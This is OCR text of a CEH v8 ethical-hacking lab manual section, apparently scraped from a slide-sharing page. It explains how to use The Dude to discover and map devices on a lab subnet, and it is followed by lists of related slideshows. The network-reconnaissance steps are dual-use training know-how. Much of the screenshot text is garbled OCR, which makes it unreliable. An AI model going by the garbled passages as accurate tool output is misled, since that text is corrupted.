Module 03 - Scanning Networks Lab Scanning Devices in a Network Using The Dude The Dnde automaticallyscansalldeviceswithin specifiedsubnets, draws andlaysout a wap ofyournetworks, monitorsservicesofyourdevices, anda/eftsyon in case someservicehasp roblems. Lab Scenario 111 the previous lab you learned how packets can be captured using Colasoft Packet Builder. Attackers too can sniff can capture and analyze packets from a network and obtain specific network information. The attacker can disrupt communication between hosts and clients by modifying system configurations, or through the physical destruction of the network. As an expert ethical hacker, you should be able to gadier information 011 organizations network to ch eck for vulnerabilities and fix them before an attacker g ets to com prom ise the m achines using th ose vulnerabilities. If you detect any attack that has been performed 011 a network, immediately implement preventative measures to stop any additional unauthorized access. 111 this lab you will learn to use The Dude tool to scan the devices in a network and the tool will alert you if any attack has been performed 011 the network. Lab O bjectives The objective of diis lab is to demonstrate how to scan all devices widiin specified subnets, draw and layout a map of your networks, and monitor services 011 die network. Lab Environm ent To carry out the lab, you need: ■ The Dude is located at D:CEH-T00lsCEHv8 Module 03 Scanning NetworksNetwork Discovery and Mapping ToolsThe Dude ■ You can also download the latest version of The Dude from the http: / / www.1nikiodk.com / thedude.php I CON KEY 5 Valuable information Test your knowledge Web exercise Workbook review V—JTools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 258
Module 03 - Scanning Networks ■ If you decide to download the latest version, then screen sh ots shown in the lab might differ ■ A computer running Windows Server 2012 ■ Double-click die The Dude and follow wizard-driven installation steps to install The Dude ■ Administrative privileges to run tools Lab Duration Time: 10 Minutes O verview of The Dude The Dude network monitor is a new application that can dramatically improve die way you manage your network environment It will automatically scan all devices within specified subnets, draw and layout a map of your networks, monitor services ofyour devices, and alert you in case some service lias problems. Lab Tasks 1. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop. i | WindowsServer2012 Ser*r 2012M «a1e CandklateDitaceM* ______________________________________________________________________________________ Ev^mbonoopy BuildWX: FIGURE 18.1: Windows Server 2012- Desktop view 111 the Start menu, to launch The Dude, click The Dude icon. Start Administrator ^ Server Computer Maiwgcr iL U * f> ~ e v -—J ‫י‬ ‫י‬ M m nitr. command T<xJ1 Prompt 1n»0u0f 0—l»p % E t a s k 1 Launch The Dude Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 259
Module 03 - Scanning Networks FIGURE 182: Windows Server2012- Startmenu 3. The main window of The Dude will appear. fSmm a d m in @ lo c a lh o s t - T h e D u d e 4 .0 b e ta 3 ’-l° l X ‫י‬ (§) 5references 9 Local Server Hdo jjyi2m c*‫״‬ m ! .TffB Setting* CJ Contert* 71S E 1 O * Ssttnst j Dkovo70011* ‫־‬ W .*.‫־‬‫־‬•. Lay* irk* v J □ A3<*T3SUSS A Admn# H 0 ‫»י‬ ‫»ו‬ H D*wic«» ?5?Flea □ FLnctona 5 M H tfay Action* H Lntu □ Lc0* £ 7 A^icn £ 7 Cecus £ 7 & ‫׳‬ent -A £ 7 Syslog E Notic? - B Keftroric Maps B Lccd I- 1U n irti [.Ca 1MU«d Ctert. a 9‫מ‬ bu« /tx 384 M S * ‫׳‬‫״*־‬ x215b c*.'U M 2bc« FIGURE 18.3:MainwindowofTheDude 4. Click the D iscover button on the toolbar of die main window. -------------------------- — ■■ a d m ir t@ lo c a lh o s t - T h e D u d e 4 .0 b e t a 3 1‫״‬. 3 E ® x ® ‫־‬ reference* 9 Local Seiver * b r h tZ a c ‫׳‬ * IIIIJHb Ca-'teri* + ‫״‬1- o * Settre# D kov* ‫־‬ | *T oo• ‫־‬• . • v 1 * « |lrk* _ d 2 Q Addra# list* A ‫׳‬vawro □ 0 ‫*ו‬‫יו‬ f‫“־‬l OmicM f* . Ftes n F_nccon8 ‫י‬ B H a a y Action* n 1^‫*י‬“ □ Leo* £ ? Acttcn £7 Defcus £7 Event £ 7 Sjobg R Mb Notie? - Q fcwortc Ma08 B Lccdl M '‫׳‬ |!Connected Cie‫׳‬ t.1x $59bus/tx 334bp* :«<* a215bo*<'u642bc« FIGURE 18.4: Selectdiscover button 5. The Device Discovery window appears. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 260
Module 03 - Scanning Networks Device Discovery DiscoverGeneral Services Device Types Advanced CancelEnter subnet number you want to scan for devices Scan Networks: 110.0.0.0/24 ! -Agent: |P£g? P Add Networks To Auto Scan Black List: |i Device Name Preference: |DNS. SNMP. NETBIOS. IP Discovery Mode: ( • fast (scan by ping) C reliable (scan each service) I I I I I I I I 2 4 6 8 10 14 20 50 Recursive Hops: / ‫י‬‫ו‬ ‫י‬ ‫־‬ ‫ר‬ ‫פ‬ F Layout Map /tfter Discovery Complete FIGURE 18.6: Devicediscovery^‫־‬uxicra‫־‬ 6. 111the Device Discovery window, specify Scan Networks range, select default from die Agent drop-down list, select DNS, SNMP, NETBIOS, and IP from die D evice Name Preference drop-down list, and click Discover. Device Discovery number you want to scan for General Services Device Types Advanced Scan Networks: (10.0.0.0/24 Agent: 5 S S H B I r Add Networks To Auto Scan Black List: [none 3DNS. SNMP. NETBIOS. IPDevice Name Preference Discovery Mode ( • fast (scan by ping) C reliable (scan each service) 0 Recursive Hops: [1 ]▼] / —r ---------------------------------------------------------------‫ו‬—‫ו‬—1—‫ו‬—‫ר‬ 2 4 6 8 10 14 20 SO I- Layout Map /tfter Discovery Complete FIGURE 18.7: Selectingdevicename preference 7. Once the scan is complete, all the devices connected to a particular network will be displayed. Ethical H acking and Counterm easures Copyright C by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 261
Module 03 - Scanning Networks ‫־‬f t ^tadrmn@localhost The Dude 4.0beta3 + - _ ^ e : _ e [ o * | S W | | Dhcovef | ^Tooia t t 1 a s ‫י‬ - |l‫־‬ks ^ 209m: [10 11d Locd •fat ! _ llB SSanhfla •. WN-D39MR5 HL9E4 AOMN I ‫י‬.N‫י‬* WIN ?U't'.lO'.-tfS ‫ז‬ ‫ר‬ ‫ב‬ - ‫נ‬ ^ ‫א‬ ‫ו‬ Qy WW*IXY858KH04P ecu 19N fn«r: 63%vM: 27%disk 75% rMflfeMtttLUUKAl YHhH.K0H)ftR3fi?M _______________Ccrtemt f~ l *ricteo Lata .4Adnns □2«*<B Chats‫ק‬ □Oevteaa Pie*‫*׳‬- Q Fu1dion» 04*07Aeten» -‫״‬‫*י‬‫׳‬1H *00‫-י‬□ 127A*en L f Uofcoa ptVem asy*B □tob>10«m dn ‫־ז‬^‫״‬‫״‬‫ס‬*Map* Q Local ‫ק‬ Metwortc* Q NotActfont H□ PjTriS Q adrrin 127.0,0.1 QPxtee 5> Sennco QTcde r i ' r - r ^ r Saver r | ( ( 4(>> *3 9t® c«Q m - ‫׳‬x 32 5■‫׳‬ oc« ‫׳‬ w I95bpj FIGURE 18.8: Overviewofnetworkconnection 8. Select a device and place die mouse cursor on it to display the detailed information about diat device. ~*1Zoom.[TO♦• ‫״‬ % jo ^ StfttKujo Dwovw tftteOT.JLYKSO-CiPWrdcvnaxnpucr‘, IP• 100 0 9 MACCtt ■- 10 S*'42m (7V U>.da3 rcOiM 1C2 coj fnemcry vrtuai memoiy. cfck SjcrT!‫.*־״.ז‬vw.-’.‫׳‬-Y35am3ip Cesacto- -fc*».=«e ntes« FamlyGWsdd 42 9eppng 7M/MCOUPATBU - Virc0*5 Ito iai 6 & End 6001WipxnsrFix)Ipwue 0028‫־‬<J771 n-n(<»• 1rc»1c:r.•:‫י‬•*11■■ 1‫ג‬ a t 1‫נ‬ » iwttdai e UU liriMMOll- )>* l*» I»_i**WU«L'i»tX>:» 1*•: 13:ta ■ . W * ‫־‬.n m ‫,־‬ t «W-ll‫־‬r8!a.H0TP 12:40 12: X | mdiv0vnn-uiYKBocnP 12:3 12:31 Iecu• lam0«■a.'iaaeoip CartvM 5Ad<*«3a Lota AAdmr* R Afl*rta □Chat* Q08V1008Plea^ Q Functions □HatovV®*•* *□Lnk Lcoa‫־‬ □ ]J?Acton C7 Detua ?£Ewr L7S«bg BMbMod®* !,tetwo*Maps Blocal n Nnwwk• 2No!llc<Uor« Q Parris 127.00.1•* ™H cN»‫׳‬P□ Q>Samcas H Tocte n.134ttpa/fc33kbc«C V t m 2 45kbp* ‫'׳‬tx 197bp» FIGURE 18.9: Detailedinformationofthe device 9. N ow , click the down arrow for die Local drop-down list to see information 011 History Actions, Tools, Files. Logs, and so 011. Ethical H acking and Counterm easures Copyright © by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 262
Module 03 - Scanning Networks FIGURE 18.10: SelectingLocalinformation 10. Select options from die drop-down list to view complete information. ‫־‬ _ < ‫־‬ X ‫־‬, adm1r!@iocalha5t ‫־‬ The Dude4.0beta3 ® | | Preferences 19 Local S w » Heb •O SetBngj e• I~ Be‫׳‬nnt dn1£1‫*׳‬d Be‫׳‬n»nt chanjed btm rU tf»a•‫׳‬ B1‫׳־‬r*« changed blvw'i: J w j*0 Br‫׳‬nf‫׳‬r!changed H»w1!«.<>•‫׳‬j«0 Be-nem changed b c w : changed Bemem changed Be'IW>.»«'jeO Berotm changed 0c1‫*׳‬s‫׳‬r. changed Beroen: changed Bc1* ‫׳‬T. cha' Sed B f w t changed Bwnert changed Berne'S changed Bwmnl eta'jed Beroen! changed Aden NetwOlk Map Ner*e«k Map tM «ak Map Nerwak Map FMflCik Mat' Nmv»c«k Map fMocik Map Merwak Map fjnC*«k Map Nef«c<k Map NetWClk Map Netwcik Map r«(.«c«k Map r‫״‬er*cfk Map tat«ak Map tieCMdk Map Netwcik Map rjefMCik Map Netwcik Map Netwcik Map I 130245 13024C 13024S 130?44 1302S0 ‫ע‬?130 130254 130? K 130258 130340 130302 1303-03 13.0306 130348 13.03.14 1303 16 13.0320 130322 130324 1303 27 ‫ו‬ u 7 U 3 U * u 5 U C U 7 U fi U 9 u 10u ‫וו‬ u 12u 13 U 14 U 15 U •6 U 7‫ו‬ u 16 U 19 U 20u Co‫׳‬not? Q Add's** Luts 4 Mm» Q Aq*0U □Owl•r*1LVvis•• ‫ליי‬rte» Q Iundior* □ IW «y /towns M Lrk» ‫>־‬ □ Logs £7A=1‫״‬n £7 Debug £? Stfog Q Mb Nedcx CemtcM 0*rt ‫׳‬x9 17kbps/|x 1 I2 kbp• S«nv‫־‬a 3 74Ktv* 11 &‫׳׳‬ Tklcn ad^n^iocalhost - The Dude 4,Obeta3 ‫־‬ a * ® fafaenoee O toca s«n ‫״‬ * ‫׳‬*‫־‬ ihti^rSSB SSX SA l J‫״‬ C J U Type, (* 3 M * f‫־‬ ‫־‬ ^i T ] □ ‫י‬ i l l l De*c* UiZ.-r'tn ‫»ז<ז‬ lias 100 a ! n-=te Local 1000.12 incte Local 1000255 MTCte Local A D ** Mncte Local V/N2H9STOSG M‫־‬ rle Local WMOUMR5HL WCte Local V /fN « 6t< SG1 w ‫־‬* • Local W IU J O 0 M I unci* Local w!s«5sn.c1u M‫־‬ de Local trmo Local W KM W S8 M‫|״‬ * Local wwoowss *met* Local oI Getnrgj L‘ Comats 3 Address Lists & Adms Q Agents Q O w i• Q Devicw '<■ Fte» Q Functor• Q KtateiyActons ‫ם‬ Lrkj ‫יה״‬1‫ס‬1‫־‬ C7Aclcn C f CebuQ r> E v.rt LfS^oo CJMb!*<!». ‫מז‬4‫׳ל‬2■^‫ל‬*rc‫־‬‫׳‬0t2I6.'?‫־‬SerC flrr ‫׳‬x 2 91 kbps / tx 276bps FIGURE 18.11: Scannednetworkcompleteinformation Ethical H acking and Counterm easures Copyright C by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 263
Module 03 - Scanning Networks 11. As described previously, you may select all the other options from the drop-down list to view die respective information. 12. Once scanning is complete, click the button to disconnect. admin©localhost - The Dude 4.0beta3 Freferences 9 Local Server *•to • ‫ל‬ Settno) d C * ” + ‫״‬ r C. O k S*Crgc Onoowf ‫״‬ Tooli f t •*.‫״‬ * i " t> ,1 ‫י‬ WikULYSSBKHQIP WIN-D39NRSH1.91=4 ADMIN tp u 22% IM fTt SOS. v.it 34% disk 75% ‫י‬ v. ‫י‬ _ W IN -2N95T0SGIEM 1 0 0 0 .1 WM-LXQ3VR3!WM R Address U8I8 £ Adn<rM □ Agert« □ Chate □ Owces r*=1« n FLnaens Q HistoryActions H Linlcs = 3 Leg* C ‫־‬f Acton (ZJDcbuo Event O S/*>og □ Mto Nodeo Q Netv.'Oik Mips r B - l gcjj <| 1■ j [> ‫־‬ r ‫־‬‫־‬^ ‫־‬‫־‬ T ^ ‫רז‬‫־‬‫ה‬^‫ל‬^‫ר‬‫־‬ nZ Wkbw 'b 135 bps 5<?vrr rt i.12cp5 't* 3•15 *bps FIGURE 18.12:Connectionof systemsinnetwork Lab Analysis Analyze and document die results related to die lab exercise. Tool/Utility Information Collected/Objectives Achieved The Dude IP Address Range: 10.0.0.0 —10.0.0.24 Device Name Preferences: DNS, SNMP, NETBIOS, IP Output: List of connected system, devices in Network Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 264
Module 03 - Scanning Networks P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . In te rn e t C o n n e ctio n R equired □ Yes 0 N o P la tfo rm S upported 0 C lassroom 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 265
Ad

Recommended

Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in Depth
Dilum Bandara
 
Wireless Penetration Testing
Wireless Penetration TestingWireless Penetration Testing
Wireless Penetration Testing
Mohammed Adam
 
Understanding NMAP
Understanding NMAPUnderstanding NMAP
Understanding NMAP
Phannarith Ou, G-CISO
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
henelpj
 
Cryptographic algorithms
Cryptographic algorithmsCryptographic algorithms
Cryptographic algorithms
Anamika Singh
 
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Sam Bowne
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
Scott Sutherland
 
3.2.2 security measures
3.2.2 security measures3.2.2 security measures
3.2.2 security measures
hazirma
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?
btpsec
 
Arpspoofing
ArpspoofingArpspoofing
Arpspoofing
UTD Computer Security Group
 
Network Security Fundamentals
Network Security FundamentalsNetwork Security Fundamentals
Network Security Fundamentals
Rahmat Suhatman
 
Reconnaissance & Scanning
Reconnaissance & ScanningReconnaissance & Scanning
Reconnaissance & Scanning
amiable_indian
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniques
amiable_indian
 
CS6004 Cyber Forensics
CS6004 Cyber ForensicsCS6004 Cyber Forensics
CS6004 Cyber Forensics
Kathirvel Ayyaswamy
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
zakieh alizadeh
 
Packet Sniffing
Packet SniffingPacket Sniffing
Packet Sniffing
guestfa1226
 
Encryption
EncryptionEncryption
Encryption
Syed Taimoor Hussain Shah
 
Introduction to Malware Detection and Reverse Engineering
Introduction to Malware Detection and Reverse EngineeringIntroduction to Malware Detection and Reverse Engineering
Introduction to Malware Detection and Reverse Engineering
intertelinvestigations
 
Malware detection-using-machine-learning
Malware detection-using-machine-learningMalware detection-using-machine-learning
Malware detection-using-machine-learning
Security Bootcamp
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
Rick Wanner
 
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Sam Bowne
 
NMAP - The Network Scanner
NMAP - The Network ScannerNMAP - The Network Scanner
NMAP - The Network Scanner
n|u - The Open Security Community
 
2. public key cryptography and RSA
2. public key cryptography and RSA2. public key cryptography and RSA
2. public key cryptography and RSA
Dr.Florence Dayana
 
Introduction to tcpdump
Introduction to tcpdumpIntroduction to tcpdump
Introduction to tcpdump
Lev Walkin
 
Socket programming
Socket programmingSocket programming
Socket programming
harsh_bca06
 
Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing
Rishabh Upadhyay
 
Cryptography and Network Security William Stallings Lawrie Brown
Cryptography and Network Security William Stallings Lawrie BrownCryptography and Network Security William Stallings Lawrie Brown
Cryptography and Network Security William Stallings Lawrie Brown
Information Security Awareness Group
 
Mobile Device Security
Mobile Device SecurityMobile Device Security
Mobile Device Security
Nemwos
 
Ceh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffersCeh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffers
Asep Sopyan
 
Ceh v8 labs module 02 footprinting and reconnaissance
Ceh v8 labs module 02 footprinting and reconnaissanceCeh v8 labs module 02 footprinting and reconnaissance
Ceh v8 labs module 02 footprinting and reconnaissance
Asep Sopyan
 
Ad

More Related Content

What's hot (20)

What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?
btpsec
 
Arpspoofing
ArpspoofingArpspoofing
Arpspoofing
UTD Computer Security Group
 
Network Security Fundamentals
Network Security FundamentalsNetwork Security Fundamentals
Network Security Fundamentals
Rahmat Suhatman
 
Reconnaissance & Scanning
Reconnaissance & ScanningReconnaissance & Scanning
Reconnaissance & Scanning
amiable_indian
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniques
amiable_indian
 
CS6004 Cyber Forensics
CS6004 Cyber ForensicsCS6004 Cyber Forensics
CS6004 Cyber Forensics
Kathirvel Ayyaswamy
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
zakieh alizadeh
 
Packet Sniffing
Packet SniffingPacket Sniffing
Packet Sniffing
guestfa1226
 
Encryption
EncryptionEncryption
Encryption
Syed Taimoor Hussain Shah
 
Introduction to Malware Detection and Reverse Engineering
Introduction to Malware Detection and Reverse EngineeringIntroduction to Malware Detection and Reverse Engineering
Introduction to Malware Detection and Reverse Engineering
intertelinvestigations
 
Malware detection-using-machine-learning
Malware detection-using-machine-learningMalware detection-using-machine-learning
Malware detection-using-machine-learning
Security Bootcamp
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
Rick Wanner
 
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Sam Bowne
 
NMAP - The Network Scanner
NMAP - The Network ScannerNMAP - The Network Scanner
NMAP - The Network Scanner
n|u - The Open Security Community
 
2. public key cryptography and RSA
2. public key cryptography and RSA2. public key cryptography and RSA
2. public key cryptography and RSA
Dr.Florence Dayana
 
Introduction to tcpdump
Introduction to tcpdumpIntroduction to tcpdump
Introduction to tcpdump
Lev Walkin
 
Socket programming
Socket programmingSocket programming
Socket programming
harsh_bca06
 
Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing
Rishabh Upadhyay
 
Cryptography and Network Security William Stallings Lawrie Brown
Cryptography and Network Security William Stallings Lawrie BrownCryptography and Network Security William Stallings Lawrie Brown
Cryptography and Network Security William Stallings Lawrie Brown
Information Security Awareness Group
 
Mobile Device Security
Mobile Device SecurityMobile Device Security
Mobile Device Security
Nemwos
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?
btpsec
 
Arpspoofing
ArpspoofingArpspoofing
Arpspoofing
UTD Computer Security Group
 
Network Security Fundamentals
Network Security FundamentalsNetwork Security Fundamentals
Network Security Fundamentals
Rahmat Suhatman
 
Reconnaissance & Scanning
Reconnaissance & ScanningReconnaissance & Scanning
Reconnaissance & Scanning
amiable_indian
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniques
amiable_indian
 
CS6004 Cyber Forensics
CS6004 Cyber ForensicsCS6004 Cyber Forensics
CS6004 Cyber Forensics
Kathirvel Ayyaswamy
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
zakieh alizadeh
 
Packet Sniffing
Packet SniffingPacket Sniffing
Packet Sniffing
guestfa1226
 
Encryption
EncryptionEncryption
Encryption
Syed Taimoor Hussain Shah
 
Introduction to Malware Detection and Reverse Engineering
Introduction to Malware Detection and Reverse EngineeringIntroduction to Malware Detection and Reverse Engineering
Introduction to Malware Detection and Reverse Engineering
intertelinvestigations
 
Malware detection-using-machine-learning
Malware detection-using-machine-learningMalware detection-using-machine-learning
Malware detection-using-machine-learning
Security Bootcamp
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
Rick Wanner
 
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Sam Bowne
 
NMAP - The Network Scanner
NMAP - The Network ScannerNMAP - The Network Scanner
NMAP - The Network Scanner
n|u - The Open Security Community
 
2. public key cryptography and RSA
2. public key cryptography and RSA2. public key cryptography and RSA
2. public key cryptography and RSA
Dr.Florence Dayana
 
Introduction to tcpdump
Introduction to tcpdumpIntroduction to tcpdump
Introduction to tcpdump
Lev Walkin
 
Socket programming
Socket programmingSocket programming
Socket programming
harsh_bca06
 
Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing
Rishabh Upadhyay
 
Cryptography and Network Security William Stallings Lawrie Brown
Cryptography and Network Security William Stallings Lawrie BrownCryptography and Network Security William Stallings Lawrie Brown
Cryptography and Network Security William Stallings Lawrie Brown
Information Security Awareness Group
 
Mobile Device Security
Mobile Device SecurityMobile Device Security
Mobile Device Security
Nemwos
 

Similar to Ceh v8 labs module 03 scanning networks (20)

Ceh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffersCeh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffers
Asep Sopyan
 
Ceh v8 labs module 02 footprinting and reconnaissance
Ceh v8 labs module 02 footprinting and reconnaissanceCeh v8 labs module 02 footprinting and reconnaissance
Ceh v8 labs module 02 footprinting and reconnaissance
Asep Sopyan
 
Ceh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffersCeh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffers
Mehrdad Jingoism
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
Mehrdad Jingoism
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
Harish Chaudhary
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumeration
Asep Sopyan
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
Karen Oliver
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
Ernest Staats
 
Ceh v8 labs module 06 trojans and backdoors
Ceh v8 labs module 06 trojans and backdoorsCeh v8 labs module 06 trojans and backdoors
Ceh v8 labs module 06 trojans and backdoors
Asep Sopyan
 
Hacking tutorial
Hacking tutorialHacking tutorial
Hacking tutorial
MSA Technosoft
 
Ceh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingCeh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hacking
Asep Sopyan
 
Ceh v8 labs module 02 footprinting and reconnaissance
Ceh v8 labs module 02 footprinting and reconnaissanceCeh v8 labs module 02 footprinting and reconnaissance
Ceh v8 labs module 02 footprinting and reconnaissance
Mehrdad Jingoism
 
Hacking
HackingHacking
Hacking
rameswara reddy venkat
 
Hacking
HackingHacking
Hacking
Roshan Chaudhary
 
Ceh v8 labs module 15 hacking wireless networks
Ceh v8 labs module 15 hacking wireless networksCeh v8 labs module 15 hacking wireless networks
Ceh v8 labs module 15 hacking wireless networks
Mehrdad Jingoism
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumeration
Mehrdad Jingoism
 
Unit 3 Pentesting Analyze log file and find the secret information using Logcat
Unit 3 Pentesting Analyze log file and find the secret information using LogcatUnit 3 Pentesting Analyze log file and find the secret information using Logcat
Unit 3 Pentesting Analyze log file and find the secret information using Logcat
ChatanBawankar
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
amiable_indian
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
ClubHack
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
ClubHack
 
Ceh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffersCeh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffers
Asep Sopyan
 
Ceh v8 labs module 02 footprinting and reconnaissance
Ceh v8 labs module 02 footprinting and reconnaissanceCeh v8 labs module 02 footprinting and reconnaissance
Ceh v8 labs module 02 footprinting and reconnaissance
Asep Sopyan
 
Ceh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffersCeh v8 labs module 08 sniffers
Ceh v8 labs module 08 sniffers
Mehrdad Jingoism
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
Mehrdad Jingoism
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
Harish Chaudhary
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumeration
Asep Sopyan
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
Karen Oliver
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
Ernest Staats
 
Ceh v8 labs module 06 trojans and backdoors
Ceh v8 labs module 06 trojans and backdoorsCeh v8 labs module 06 trojans and backdoors
Ceh v8 labs module 06 trojans and backdoors
Asep Sopyan
 
Hacking tutorial
Hacking tutorialHacking tutorial
Hacking tutorial
MSA Technosoft
 
Ceh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hackingCeh v8 labs module 05 system hacking
Ceh v8 labs module 05 system hacking
Asep Sopyan
 
Ceh v8 labs module 02 footprinting and reconnaissance
Ceh v8 labs module 02 footprinting and reconnaissanceCeh v8 labs module 02 footprinting and reconnaissance
Ceh v8 labs module 02 footprinting and reconnaissance
Mehrdad Jingoism
 
Hacking
HackingHacking
Hacking
rameswara reddy venkat
 
Hacking
HackingHacking
Hacking
Roshan Chaudhary
 
Ceh v8 labs module 15 hacking wireless networks
Ceh v8 labs module 15 hacking wireless networksCeh v8 labs module 15 hacking wireless networks
Ceh v8 labs module 15 hacking wireless networks
Mehrdad Jingoism
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumeration
Mehrdad Jingoism
 
Unit 3 Pentesting Analyze log file and find the secret information using Logcat
Unit 3 Pentesting Analyze log file and find the secret information using LogcatUnit 3 Pentesting Analyze log file and find the secret information using Logcat
Unit 3 Pentesting Analyze log file and find the secret information using Logcat
ChatanBawankar
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
amiable_indian
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
